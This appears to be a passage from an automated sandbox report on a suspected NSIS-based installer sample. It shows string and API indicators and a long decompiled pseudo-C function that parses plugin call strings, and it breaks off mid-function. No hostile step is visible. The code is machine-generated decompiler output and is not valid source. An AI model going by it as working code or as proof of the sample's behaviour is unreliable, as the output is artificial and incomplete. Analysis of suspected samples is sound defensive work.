                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                          • String ID: "$"C:\Users\user\Desktop\lpdKSOB78u.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\lpdKSOB78u.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                          • API String ID: 538718688-4101208944
                                                                                                                          • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                                                          • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                                                                          • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                                                          • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E70481A98() {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				CHAR* _v24;
                                                                                                                          				CHAR* _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				CHAR* _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				void* _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				CHAR* _t207;
                                                                                                                          				signed int _t210;
                                                                                                                          				void* _t212;
                                                                                                                          				void* _t214;
                                                                                                                          				CHAR* _t216;
                                                                                                                          				void* _t224;
                                                                                                                          				struct HINSTANCE__* _t225;
                                                                                                                          				struct HINSTANCE__* _t226;
                                                                                                                          				struct HINSTANCE__* _t228;
                                                                                                                          				signed short _t230;
                                                                                                                          				struct HINSTANCE__* _t233;
                                                                                                                          				struct HINSTANCE__* _t235;
                                                                                                                          				void* _t236;
                                                                                                                          				char* _t237;
                                                                                                                          				void* _t248;
                                                                                                                          				signed char _t249;
                                                                                                                          				signed int _t250;
                                                                                                                          				void* _t254;
                                                                                                                          				struct HINSTANCE__* _t256;
                                                                                                                          				void* _t257;
                                                                                                                          				signed int _t259;
                                                                                                                          				intOrPtr _t260;
                                                                                                                          				char* _t263;
                                                                                                                          				signed int _t268;
                                                                                                                          				signed int _t271;
                                                                                                                          				signed int _t273;
                                                                                                                          				void* _t276;
                                                                                                                          				void* _t280;
                                                                                                                          				struct HINSTANCE__* _t282;
                                                                                                                          				intOrPtr _t285;
                                                                                                                          				void _t286;
                                                                                                                          				signed int _t287;
                                                                                                                          				signed int _t299;
                                                                                                                          				signed int _t300;
                                                                                                                          				intOrPtr _t303;
                                                                                                                          				void* _t304;
                                                                                                                          				signed int _t308;
                                                                                                                          				signed int _t311;
                                                                                                                          				signed int _t314;
                                                                                                                          				signed int _t315;
                                                                                                                          				signed int _t316;
                                                                                                                          				intOrPtr _t319;
                                                                                                                          				intOrPtr* _t320;
                                                                                                                          				CHAR* _t321;
                                                                                                                          				CHAR* _t323;
                                                                                                                          				CHAR* _t324;
                                                                                                                          				struct HINSTANCE__* _t325;
                                                                                                                          				void* _t327;
                                                                                                                          				signed int _t328;
                                                                                                                          				void* _t329;
                                                                                                                          
                                                                                                                          				_t282 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_t329 = 0;
                                                                                                                          				_v52 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_t207 = E70481215();
                                                                                                                          				_v24 = _t207;
                                                                                                                          				_v28 = _t207;
                                                                                                                          				_v48 = E70481215();
                                                                                                                          				_t320 = E7048123B();
                                                                                                                          				_v56 = _t320;
                                                                                                                          				_v12 = _t320;
                                                                                                                          				while(1) {
                                                                                                                          					_t210 = _v32;
                                                                                                                          					_v60 = _t210;
                                                                                                                          					if(_t210 != _t282 && _t329 == _t282) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t319 =  *_t320;
                                                                                                                          					_t285 = _t319;
                                                                                                                          					_t212 = _t285 - _t282;
                                                                                                                          					if(_t212 == 0) {
                                                                                                                          						_t37 =  &_v32;
                                                                                                                          						 *_t37 = _v32 | 0xffffffff;
                                                                                                                          						__eflags =  *_t37;
                                                                                                                          						L20:
                                                                                                                          						_t214 = _v60 - _t282;
                                                                                                                          						if(_t214 == 0) {
                                                                                                                          							 *_v28 =  *_v28 & 0x00000000;
                                                                                                                          							__eflags = _t329 - _t282;
                                                                                                                          							if(_t329 == _t282) {
                                                                                                                          								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
                                                                                                                          								_t329 = _t254;
                                                                                                                          								 *(_t329 + 0x810) = _t282;
                                                                                                                          								 *(_t329 + 0x814) = _t282;
                                                                                                                          							}
                                                                                                                          							_t286 = _v36;
                                                                                                                          							_t47 = _t329 + 8; // 0x8
                                                                                                                          							_t216 = _t47;
                                                                                                                          							_t48 = _t329 + 0x408; // 0x408
                                                                                                                          							_t321 = _t48;
                                                                                                                          							 *_t329 = _t286;
                                                                                                                          							 *_t216 =  *_t216 & 0x00000000;
                                                                                                                          							 *(_t329 + 0x808) = _t282;
                                                                                                                          							 *_t321 =  *_t321 & 0x00000000;
                                                                                                                          							_t287 = _t286 - _t282;
                                                                                                                          							__eflags = _t287;
                                                                                                                          							 *(_t329 + 0x80c) = _t282;
                                                                                                                          							 *(_t329 + 4) = _t282;
                                                                                                                          							if(_t287 == 0) {
                                                                                                                          								__eflags = _v28 - _v24;
                                                                                                                          								if(_v28 == _v24) {
                                                                                                                          									goto L42;
                                                                                                                          								}
                                                                                                                          								_t327 = 0;
                                                                                                                          								GlobalFree(_t329);
                                                                                                                          								_t329 = E704812FE(_v24);
                                                                                                                          								__eflags = _t329 - _t282;
                                                                                                                          								if(_t329 == _t282) {
                                                                                                                          									goto L42;
                                                                                                                          								} else {
                                                                                                                          									goto L35;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L35:
                                                                                                                          									_t248 =  *(_t329 + 0x14a0);
                                                                                                                          									__eflags = _t248 - _t282;
                                                                                                                          									if(_t248 == _t282) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_t327 = _t329;
                                                                                                                          									_t329 = _t248;
                                                                                                                          									__eflags = _t329 - _t282;
                                                                                                                          									if(_t329 != _t282) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eflags = _t327 - _t282;
                                                                                                                          								if(_t327 != _t282) {
                                                                                                                          									 *(_t327 + 0x14a0) = _t282;
                                                                                                                          								}
                                                                                                                          								_t249 =  *(_t329 + 0x810);
                                                                                                                          								__eflags = _t249 & 0x00000008;
                                                                                                                          								if((_t249 & 0x00000008) == 0) {
                                                                                                                          									_t250 = _t249 | 0x00000002;
                                                                                                                          									__eflags = _t250;
                                                                                                                          									 *(_t329 + 0x810) = _t250;
                                                                                                                          								} else {
                                                                                                                          									_t329 = E70481534(_t329);
                                                                                                                          									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
                                                                                                                          								}
                                                                                                                          								goto L42;
                                                                                                                          							} else {
                                                                                                                          								_t299 = _t287 - 1;
                                                                                                                          								__eflags = _t299;
                                                                                                                          								if(_t299 == 0) {
                                                                                                                          									L31:
                                                                                                                          									lstrcpyA(_t216, _v48);
                                                                                                                          									L32:
                                                                                                                          									lstrcpyA(_t321, _v24);
                                                                                                                          									goto L42;
                                                                                                                          								}
                                                                                                                          								_t300 = _t299 - 1;
                                                                                                                          								__eflags = _t300;
                                                                                                                          								if(_t300 == 0) {
                                                                                                                          									goto L32;
                                                                                                                          								}
                                                                                                                          								__eflags = _t300 != 1;
                                                                                                                          								if(_t300 != 1) {
                                                                                                                          									goto L42;
                                                                                                                          								}
                                                                                                                          								goto L31;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t214 == 1) {
                                                                                                                          								_t256 = _v16;
                                                                                                                          								if(_v40 == _t282) {
                                                                                                                          									_t256 = _t256 - 1;
                                                                                                                          								}
                                                                                                                          								 *(_t329 + 0x814) = _t256;
                                                                                                                          							}
                                                                                                                          							L42:
                                                                                                                          							_v12 = _v12 + 1;
                                                                                                                          							_v28 = _v24;
                                                                                                                          							L59:
                                                                                                                          							if(_v32 != 0xffffffff) {
                                                                                                                          								_t320 = _v12;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t257 = _t212 - 0x23;
                                                                                                                          					if(_t257 == 0) {
                                                                                                                          						__eflags = _t320 - _v56;
                                                                                                                          						if(_t320 <= _v56) {
                                                                                                                          							L17:
                                                                                                                          							__eflags = _v44 - _t282;
                                                                                                                          							if(_v44 != _t282) {
                                                                                                                          								L43:
                                                                                                                          								_t259 = _v32 - _t282;
                                                                                                                          								__eflags = _t259;
                                                                                                                          								if(_t259 == 0) {
                                                                                                                          									_t260 = _t319;
                                                                                                                          									while(1) {
                                                                                                                          										__eflags = _t260 - 0x22;
                                                                                                                          										if(_t260 != 0x22) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t320 = _t320 + 1;
                                                                                                                          										__eflags = _v44 - _t282;
                                                                                                                          										_v12 = _t320;
                                                                                                                          										if(_v44 == _t282) {
                                                                                                                          											_v44 = 1;
                                                                                                                          											L162:
                                                                                                                          											_v28 =  &(_v28[1]);
                                                                                                                          											 *_v28 =  *_t320;
                                                                                                                          											L58:
                                                                                                                          											_t328 = _t320 + 1;
                                                                                                                          											__eflags = _t328;
                                                                                                                          											_v12 = _t328;
                                                                                                                          											goto L59;
                                                                                                                          										}
                                                                                                                          										_t260 =  *_t320;
                                                                                                                          										_v44 = _t282;
                                                                                                                          									}
                                                                                                                          									__eflags = _t260 - 0x2a;
                                                                                                                          									if(_t260 == 0x2a) {
                                                                                                                          										_v36 = 2;
                                                                                                                          										L57:
                                                                                                                          										_t320 = _v12;
                                                                                                                          										_v28 = _v24;
                                                                                                                          										_t282 = 0;
                                                                                                                          										__eflags = 0;
                                                                                                                          										goto L58;
                                                                                                                          									}
                                                                                                                          									__eflags = _t260 - 0x2d;
                                                                                                                          									if(_t260 == 0x2d) {
                                                                                                                          										L151:
                                                                                                                          										_t303 =  *_t320;
                                                                                                                          										__eflags = _t303 - 0x2d;
                                                                                                                          										if(_t303 != 0x2d) {
                                                                                                                          											L154:
                                                                                                                          											_t263 = _t320 + 1;
                                                                                                                          											__eflags =  *_t263 - 0x3a;
                                                                                                                          											if( *_t263 != 0x3a) {
                                                                                                                          												goto L162;
                                                                                                                          											}
                                                                                                                          											__eflags = _t303 - 0x2d;
                                                                                                                          											if(_t303 == 0x2d) {
                                                                                                                          												goto L162;
                                                                                                                          											}
                                                                                                                          											_v36 = 1;
                                                                                                                          											L157:
                                                                                                                          											_v12 = _t263;
                                                                                                                          											__eflags = _v28 - _v24;
                                                                                                                          											if(_v28 <= _v24) {
                                                                                                                          												 *_v48 =  *_v48 & 0x00000000;
                                                                                                                          											} else {
                                                                                                                          												 *_v28 =  *_v28 & 0x00000000;
                                                                                                                          												lstrcpyA(_v48, _v24);
                                                                                                                          											}
                                                                                                                          											goto L57;
                                                                                                                          										}
                                                                                                                          										_t263 = _t320 + 1;
                                                                                                                          										__eflags =  *_t263 - 0x3e;
                                                                                                                          										if( *_t263 != 0x3e) {
                                                                                                                          											goto L154;
                                                                                                                          										}
                                                                                                                          										_v36 = 3;
                                                                                                                          										goto L157;
                                                                                                                          									}
                                                                                                                          									__eflags = _t260 - 0x3a;
                                                                                                                          									if(_t260 != 0x3a) {
                                                                                                                          										goto L162;
                                                                                                                          									}
                                                                                                                          									goto L151;
                                                                                                                          								}
                                                                                                                          								_t268 = _t259 - 1;
                                                                                                                          								__eflags = _t268;
                                                                                                                          								if(_t268 == 0) {
                                                                                                                          									L80:
                                                                                                                          									_t304 = _t285 + 0xffffffde;
                                                                                                                          									__eflags = _t304 - 0x55;
                                                                                                                          									if(_t304 > 0x55) {
                                                                                                                          										goto L57;
                                                                                                                          									}
                                                                                                                          									switch( *((intOrPtr*)(( *(_t304 + 0x70482259) & 0x000000ff) * 4 +  &M704821CD))) {
                                                                                                                          										case 0:
                                                                                                                          											__eax = _v24;
                                                                                                                          											__edi = _v12;
                                                                                                                          											while(1) {
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												_v12 = __edi;
                                                                                                                          												__cl =  *__edi;
                                                                                                                          												__eflags = __cl - __dl;
                                                                                                                          												if(__cl != __dl) {
                                                                                                                          													goto L132;
                                                                                                                          												}
                                                                                                                          												L131:
                                                                                                                          												__eflags =  *(__edi + 1) - __dl;
                                                                                                                          												if( *(__edi + 1) != __dl) {
                                                                                                                          													L136:
                                                                                                                          													 *__eax =  *__eax & 0x00000000;
                                                                                                                          													__eax = E70481224(_v24);
                                                                                                                          													__ebx = __eax;
                                                                                                                          													goto L97;
                                                                                                                          												}
                                                                                                                          												L132:
                                                                                                                          												__eflags = __cl;
                                                                                                                          												if(__cl == 0) {
                                                                                                                          													goto L136;
                                                                                                                          												}
                                                                                                                          												__eflags = __cl - __dl;
                                                                                                                          												if(__cl == __dl) {
                                                                                                                          													__edi = __edi + 1;
                                                                                                                          													__eflags = __edi;
                                                                                                                          												}
                                                                                                                          												__cl =  *__edi;
                                                                                                                          												 *__eax =  *__edi;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												_v12 = __edi;
                                                                                                                          												__cl =  *__edi;
                                                                                                                          												__eflags = __cl - __dl;
                                                                                                                          												if(__cl != __dl) {
                                                                                                                          													goto L132;
                                                                                                                          												}
                                                                                                                          												goto L131;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											_v8 = 1;
                                                                                                                          											goto L57;
                                                                                                                          										case 2:
                                                                                                                          											_v8 = _v8 | 0xffffffff;
                                                                                                                          											goto L57;
                                                                                                                          										case 3:
                                                                                                                          											_v8 = _v8 & 0x00000000;
                                                                                                                          											_v20 = _v20 & 0x00000000;
                                                                                                                          											_v16 = _v16 + 1;
                                                                                                                          											goto L85;
                                                                                                                          										case 4:
                                                                                                                          											__eflags = _v20;
                                                                                                                          											if(_v20 != 0) {
                                                                                                                          												goto L57;
                                                                                                                          											}
                                                                                                                          											_v12 = _v12 - 1;
                                                                                                                          											__ebx = E70481215();
                                                                                                                          											 &_v12 = E70481A36( &_v12);
                                                                                                                          											__eax = E70481429(__edx, __eax, __edx, __ebx);
                                                                                                                          											goto L97;
                                                                                                                          										case 5:
                                                                                                                          											L105:
                                                                                                                          											_v20 = _v20 + 1;
                                                                                                                          											goto L57;
                                                                                                                          										case 6:
                                                                                                                          											_push(7);
                                                                                                                          											goto L123;
                                                                                                                          										case 7:
                                                                                                                          											_push(0x19);
                                                                                                                          											goto L143;
                                                                                                                          										case 8:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L107;
                                                                                                                          										case 9:
                                                                                                                          											_push(0x15);
                                                                                                                          											goto L143;
                                                                                                                          										case 0xa:
                                                                                                                          											_push(0x16);
                                                                                                                          											goto L143;
                                                                                                                          										case 0xb:
                                                                                                                          											_push(0x18);
                                                                                                                          											goto L143;
                                                                                                                          										case 0xc:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L118;
                                                                                                                          										case 0xd:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L109;
                                                                                                                          										case 0xe:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L111;
                                                                                                                          										case 0xf:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L122;
                                                                                                                          										case 0x10:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L113;
                                                                                                                          										case 0x11:
                                                                                                                          											_push(3);
                                                                                                                          											goto L123;
                                                                                                                          										case 0x12:
                                                                                                                          											_push(0x17);
                                                                                                                          											L143:
                                                                                                                          											_pop(__ebx);
                                                                                                                          											goto L98;
                                                                                                                          										case 0x13:
                                                                                                                          											__eax =  &_v12;
                                                                                                                          											__eax = E70481A36( &_v12);
                                                                                                                          											__ebx = __eax;
                                                                                                                          											__ebx = __eax + 1;
                                                                                                                          											__eflags = __ebx - 0xb;
                                                                                                                          											if(__ebx < 0xb) {
                                                                                                                          												__ebx = __ebx + 0xa;
                                                                                                                          											}
                                                                                                                          											goto L97;
                                                                                                                          										case 0x14:
                                                                                                                          											__ebx = 0xffffffff;
                                                                                                                          											goto L98;
                                                                                                                          										case 0x15:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags = 0;
                                                                                                                          											goto L116;
                                                                                                                          										case 0x16:
                                                                                                                          											__ecx = 0;
                                                                                                                          											__eflags = 0;
                                                                                                                          											goto L91;
                                                                                                                          										case 0x17:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eax = 1;
                                                                                                                          											__eflags = 1;
                                                                                                                          											goto L120;
                                                                                                                          										case 0x18:
                                                                                                                          											_t270 =  *(_t329 + 0x814);
                                                                                                                          											__eflags = _t270 - _v16;
                                                                                                                          											if(_t270 > _v16) {
                                                                                                                          												_v16 = _t270;
                                                                                                                          											}
                                                                                                                          											_v8 = _v8 & 0x00000000;
                                                                                                                          											_v20 = _v20 & 0x00000000;
                                                                                                                          											_v36 - 3 = _t270 - (_v36 == 3);
                                                                                                                          											if(_t270 != _v36 == 3) {
                                                                                                                          												L85:
                                                                                                                          												_v40 = 1;
                                                                                                                          											}
                                                                                                                          											goto L57;
                                                                                                                          										case 0x19:
                                                                                                                          											L107:
                                                                                                                          											__ecx = 0;
                                                                                                                          											_v8 = 2;
                                                                                                                          											__ecx = 1;
                                                                                                                          											goto L91;
                                                                                                                          										case 0x1a:
                                                                                                                          											L118:
                                                                                                                          											_push(5);
                                                                                                                          											goto L123;
                                                                                                                          										case 0x1b:
                                                                                                                          											L109:
                                                                                                                          											__ecx = 0;
                                                                                                                          											_v8 = 3;
                                                                                                                          											__ecx = 1;
                                                                                                                          											goto L91;
                                                                                                                          										case 0x1c:
                                                                                                                          											L111:
                                                                                                                          											__ecx = 0;
                                                                                                                          											__ecx = 1;
                                                                                                                          											goto L91;
                                                                                                                          										case 0x1d:
                                                                                                                          											L122:
                                                                                                                          											_push(6);
                                                                                                                          											goto L123;
                                                                                                                          										case 0x1e:
                                                                                                                          											L113:
                                                                                                                          											_push(2);
                                                                                                                          											goto L123;
                                                                                                                          										case 0x1f:
                                                                                                                          											__eax =  &_v12;
                                                                                                                          											__eax = E70481A36( &_v12);
                                                                                                                          											__ebx = __eax;
                                                                                                                          											__ebx = __eax + 1;
                                                                                                                          											goto L97;
                                                                                                                          										case 0x20:
                                                                                                                          											L116:
                                                                                                                          											_v52 = _v52 + 1;
                                                                                                                          											_push(3);
                                                                                                                          											_pop(__ecx);
                                                                                                                          											goto L91;
                                                                                                                          										case 0x21:
                                                                                                                          											L120:
                                                                                                                          											_push(4);
                                                                                                                          											L123:
                                                                                                                          											_pop(__ecx);
                                                                                                                          											L91:
                                                                                                                          											__edi = _v16;
                                                                                                                          											__edx =  *(0x7048305c + __ecx * 4);
                                                                                                                          											__eax =  ~__eax;
                                                                                                                          											asm("sbb eax, eax");
                                                                                                                          											_v40 = 1;
                                                                                                                          											__edi = _v16 << 5;
                                                                                                                          											__eax = __eax & 0x00008000;
                                                                                                                          											__edi = (_v16 << 5) + __esi;
                                                                                                                          											__eax = __eax | __ecx;
                                                                                                                          											__eflags = _v8;
                                                                                                                          											 *(__edi + 0x818) = __eax;
                                                                                                                          											if(_v8 < 0) {
                                                                                                                          												L93:
                                                                                                                          												__edx = 0;
                                                                                                                          												__edx = 1;
                                                                                                                          												__eflags = 1;
                                                                                                                          												L94:
                                                                                                                          												__eflags = _v8 - 1;
                                                                                                                          												 *(__edi + 0x828) = __edx;
                                                                                                                          												if(_v8 == 1) {
                                                                                                                          													__eax =  &_v12;
                                                                                                                          													__eax = E70481A36( &_v12);
                                                                                                                          													__eax = __eax + 1;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													_v8 = __eax;
                                                                                                                          												}
                                                                                                                          												__eax = _v8;
                                                                                                                          												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                                                                                          												_t136 = _v16 + 0x41; // 0x41
                                                                                                                          												_t136 = _t136 << 5;
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags = 0;
                                                                                                                          												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                                                          												 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                                                                                          												 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                                                                                          												L97:
                                                                                                                          												__eflags = __ebx;
                                                                                                                          												if(__ebx == 0) {
                                                                                                                          													goto L57;
                                                                                                                          												}
                                                                                                                          												L98:
                                                                                                                          												__eflags = _v20;
                                                                                                                          												_v40 = 1;
                                                                                                                          												if(_v20 != 0) {
                                                                                                                          													L103:
                                                                                                                          													__eflags = _v20 - 1;
                                                                                                                          													if(_v20 == 1) {
                                                                                                                          														__eax = _v16;
                                                                                                                          														__eax = _v16 << 5;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														 *(__eax + __esi + 0x82c) = __ebx;
                                                                                                                          													}
                                                                                                                          													goto L105;
                                                                                                                          												}
                                                                                                                          												_v16 = _v16 << 5;
                                                                                                                          												_t144 = __esi + 0x830; // 0x830
                                                                                                                          												__edi = (_v16 << 5) + _t144;
                                                                                                                          												__eax =  *__edi;
                                                                                                                          												__eflags = __eax - 0xffffffff;
                                                                                                                          												if(__eax <= 0xffffffff) {
                                                                                                                          													L101:
                                                                                                                          													__eax = GlobalFree(__eax);
                                                                                                                          													L102:
                                                                                                                          													 *__edi = __ebx;
                                                                                                                          													goto L103;
                                                                                                                          												}
                                                                                                                          												__eflags = __eax - 0x19;
                                                                                                                          												if(__eax <= 0x19) {
                                                                                                                          													goto L102;
                                                                                                                          												}
                                                                                                                          												goto L101;
                                                                                                                          											}
                                                                                                                          											__eflags = __edx;
                                                                                                                          											if(__edx > 0) {
                                                                                                                          												goto L94;
                                                                                                                          											}
                                                                                                                          											goto L93;
                                                                                                                          										case 0x22:
                                                                                                                          											goto L57;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t271 = _t268 - 1;
                                                                                                                          								__eflags = _t271;
                                                                                                                          								if(_t271 == 0) {
                                                                                                                          									_v16 = _t282;
                                                                                                                          									goto L80;
                                                                                                                          								}
                                                                                                                          								__eflags = _t271 != 1;
                                                                                                                          								if(_t271 != 1) {
                                                                                                                          									goto L162;
                                                                                                                          								}
                                                                                                                          								__eflags = _t285 - 0x6e;
                                                                                                                          								if(__eflags > 0) {
                                                                                                                          									_t308 = _t285 - 0x72;
                                                                                                                          									__eflags = _t308;
                                                                                                                          									if(_t308 == 0) {
                                                                                                                          										_push(4);
                                                                                                                          										L74:
                                                                                                                          										_pop(_t273);
                                                                                                                          										L75:
                                                                                                                          										__eflags = _v8 - 1;
                                                                                                                          										if(_v8 != 1) {
                                                                                                                          											_t96 = _t329 + 0x810;
                                                                                                                          											 *_t96 =  *(_t329 + 0x810) &  !_t273;
                                                                                                                          											__eflags =  *_t96;
                                                                                                                          										} else {
                                                                                                                          											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
                                                                                                                          										}
                                                                                                                          										_v8 = 1;
                                                                                                                          										goto L57;
                                                                                                                          									}
                                                                                                                          									_t311 = _t308 - 1;
                                                                                                                          									__eflags = _t311;
                                                                                                                          									if(_t311 == 0) {
                                                                                                                          										_push(0x10);
                                                                                                                          										goto L74;
                                                                                                                          									}
                                                                                                                          									__eflags = _t311 != 0;
                                                                                                                          									if(_t311 != 0) {
                                                                                                                          										goto L57;
                                                                                                                          									}
                                                                                                                          									_push(0x40);
                                                                                                                          									goto L74;
                                                                                                                          								}
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									_push(8);
                                                                                                                          									goto L74;
                                                                                                                          								}
                                                                                                                          								_t314 = _t285 - 0x21;
                                                                                                                          								__eflags = _t314;
                                                                                                                          								if(_t314 == 0) {
                                                                                                                          									_v8 =  ~_v8;
                                                                                                                          									goto L57;
                                                                                                                          								}
                                                                                                                          								_t315 = _t314 - 0x11;
                                                                                                                          								__eflags = _t315;
                                                                                                                          								if(_t315 == 0) {
                                                                                                                          									_t273 = 0x100;
                                                                                                                          									goto L75;
                                                                                                                          								}
                                                                                                                          								_t316 = _t315 - 0x31;
                                                                                                                          								__eflags = _t316;
                                                                                                                          								if(_t316 == 0) {
                                                                                                                          									_t273 = 1;
                                                                                                                          									goto L75;
                                                                                                                          								}
                                                                                                                          								__eflags = _t316 != 0;
                                                                                                                          								if(_t316 != 0) {
                                                                                                                          									goto L57;
                                                                                                                          								}
                                                                                                                          								_push(0x20);
                                                                                                                          								goto L74;
                                                                                                                          							} else {
                                                                                                                          								_v32 = _t282;
                                                                                                                          								_v36 = _t282;
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
                                                                                                                          						if( *((char*)(_t320 - 1)) != 0x3a) {
                                                                                                                          							goto L17;
                                                                                                                          						}
                                                                                                                          						__eflags = _v32 - _t282;
                                                                                                                          						if(_v32 == _t282) {
                                                                                                                          							goto L43;
                                                                                                                          						}
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          					_t276 = _t257 - 5;
                                                                                                                          					if(_t276 == 0) {
                                                                                                                          						__eflags = _v44 - _t282;
                                                                                                                          						if(_v44 != _t282) {
                                                                                                                          							goto L43;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _v36 - 3;
                                                                                                                          							_v32 = 1;
                                                                                                                          							_v8 = _t282;
                                                                                                                          							_v20 = _t282;
                                                                                                                          							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                                          							_v40 = _t282;
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t280 = _t276 - 1;
                                                                                                                          					if(_t280 == 0) {
                                                                                                                          						__eflags = _v44 - _t282;
                                                                                                                          						if(_v44 != _t282) {
                                                                                                                          							goto L43;
                                                                                                                          						} else {
                                                                                                                          							_v32 = 2;
                                                                                                                          							_v8 = _t282;
                                                                                                                          							_v20 = _t282;
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t280 != 0x16) {
                                                                                                                          						goto L43;
                                                                                                                          					} else {
                                                                                                                          						_v32 = 3;
                                                                                                                          						_v8 = 1;
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				GlobalFree(_v56);
                                                                                                                          				GlobalFree(_v24);
                                                                                                                          				GlobalFree(_v48);
                                                                                                                          				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
                                                                                                                          					L182:
                                                                                                                          					return _t329;
                                                                                                                          				} else {
                                                                                                                          					_t224 =  *_t329 - 1;
                                                                                                                          					if(_t224 == 0) {
                                                                                                                          						_t187 = _t329 + 8; // 0x8
                                                                                                                          						_t323 = _t187;
                                                                                                                          						__eflags =  *_t323;
                                                                                                                          						if( *_t323 != 0) {
                                                                                                                          							_t225 = GetModuleHandleA(_t323); // executed
                                                                                                                          							__eflags = _t225 - _t282;
                                                                                                                          							 *(_t329 + 0x808) = _t225;
                                                                                                                          							if(_t225 != _t282) {
                                                                                                                          								L171:
                                                                                                                          								_t192 = _t329 + 0x408; // 0x408
                                                                                                                          								_t324 = _t192;
                                                                                                                          								_t226 = E704815C2( *(_t329 + 0x808), _t324);
                                                                                                                          								__eflags = _t226 - _t282;
                                                                                                                          								 *(_t329 + 0x80c) = _t226;
                                                                                                                          								if(_t226 == _t282) {
                                                                                                                          									__eflags =  *_t324 - 0x23;
                                                                                                                          									if( *_t324 == 0x23) {
                                                                                                                          										_t195 = _t329 + 0x409; // 0x409
                                                                                                                          										_t230 = E704812FE(_t195);
                                                                                                                          										__eflags = _t230 - _t282;
                                                                                                                          										if(_t230 != _t282) {
                                                                                                                          											__eflags = _t230 & 0xffff0000;
                                                                                                                          											if((_t230 & 0xffff0000) == 0) {
